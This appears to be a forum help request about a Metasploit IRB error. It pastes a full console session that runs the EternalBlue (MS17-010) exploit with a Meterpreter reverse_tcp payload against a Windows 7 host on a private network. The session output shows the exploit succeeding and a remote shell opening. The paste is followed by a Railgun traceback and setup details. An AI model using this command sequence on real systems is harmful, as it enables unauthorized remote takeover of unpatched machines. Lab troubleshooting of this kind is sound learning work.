I have some troubles in order to attempt making some orders thru meterpreter, with the irb interpreter running i have the following exit:
"
*msf5 > use exploit/windows/smb/ms17_010_eternalblue*
*msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp*
*payload => windows/x64/meterpreter/reverse_tcp*
*msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.102*
*RHOSTS => 192.168.0.102*
*msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.101*
*LHOST => 192.168.0.101*
*msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit*
*[*] Started reverse TCP handler on 192.168.0.101:4444 *
*[+] 192.168.0.102:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)*
*[*] 192.168.0.102:445 - Connecting to target for exploitation.*
*[+] 192.168.0.102:445 - Connection established for exploitation.*
*[+] 192.168.0.102:445 - Target OS selected valid for OS indicated by SMB reply*
*[*] 192.168.0.102:445 - CORE raw buffer dump (38 bytes)*
*[*] 192.168.0.102:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima*
*[*] 192.168.0.102:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service *
*[*] 192.168.0.102:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 *
*[+] 192.168.0.102:445 - Target arch selected valid for arch indicated by DCE/RPC reply*
*[*] 192.168.0.102:445 - Trying exploit with 12 Groom Allocations.*
*[*] 192.168.0.102:445 - Sending all but last fragment of exploit packet*
*[*] 192.168.0.102:445 - Starting non-paged pool grooming*
*[+] 192.168.0.102:445 - Sending SMBv2 buffers*
*[+] 192.168.0.102:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.*
*[*] 192.168.0.102:445 - Sending final SMBv2 buffers.*
*[*] 192.168.0.102:445 - Sending last fragment of exploit packet!*
*[*] 192.168.0.102:445 - Receiving response from exploit packet*
*[+] 192.168.0.102:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!*
*[*] 192.168.0.102:445 - Sending egg to corrupted connection.*
*[*] 192.168.0.102:445 - Triggering free of corrupted buffer.*
*[*] Sending stage (206403 bytes) to 192.168.0.102*
*[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.102:49287) at 2019-06-17 21:08:26 -0300*
*[+] 192.168.0.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=*
*[+] 192.168.0.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=*
*[+] 192.168.0.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=*
*meterpreter > irb*
*[*] Starting IRB shell...*
*[*] You are in the "client" (session) object*
*irb: warn: can't alias kill from irb_kill.*
*>> client.railgun.known_dll_names*
*Traceback (most recent call last):*
* 16: from /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1363:in `cmd_sessions'*
* 15: from /usr/share/metasploit-framework/lib/rex/ui/interactive.rb:51:in `interact'*
* 14: from /usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:575:in `_interact'*
* 13: from /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'*
* 12: from /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:146:in `run'*
* 11: from /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'*
* 10: from /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'*
* 9: from /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'*
* 8: from /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'*
* 7: from /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:105:in `run_command'*
* 6: from /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'*
* 5: from /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:573:in `cmd_irb'*
* 4: from /usr/share/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `run'*
* 3: from /usr/share/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `catch'*
* 2: from /usr/share/metasploit-framework/lib/rex/ui/text/irb_shell.rb:53:in `block in run'*
* 1: from (irb):1*
*NoMethodError (undefined method `railgun' for nil:NilClass)*
*>>*
"
i have forked & installed msf as developer, without any problems i think… setting up all the environment like the manifest of https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
#uname -a
Linux parrot 5.1.0-parrot1-3t-amd64 #1 SMP Parrot 5.1.3-1parrot1.3t (2019-05-20) x86_64 GNU/Linux (installed via Debian Standard)
It’s not a multiboot configuration.
#gem --version
2.7.6.2
blabla/git/metasploit-framework#cat .ruby_version
2.6.2
I installed RVM to manage de ruby versions
I’m tried to take some hints of the Railgun API extension, and some other fonts (listed below), without success, so please send me the light at the finish of the tunnel
I appreciate some people that would guide me in my noob first-steps…
https://rubyfu.net/module-0x5-or-exploitation-kung-fu/metasploit/meterpreter/railgun-api-extension
https://docs.ruby-lang.org/en/2.6.0/IRB/IrbLoader.html#method-i-irb_load
https://www.darkoperator.com/blog/2017/10/21/basics-of-the-metasploit-framework-irb-setup
Many thanks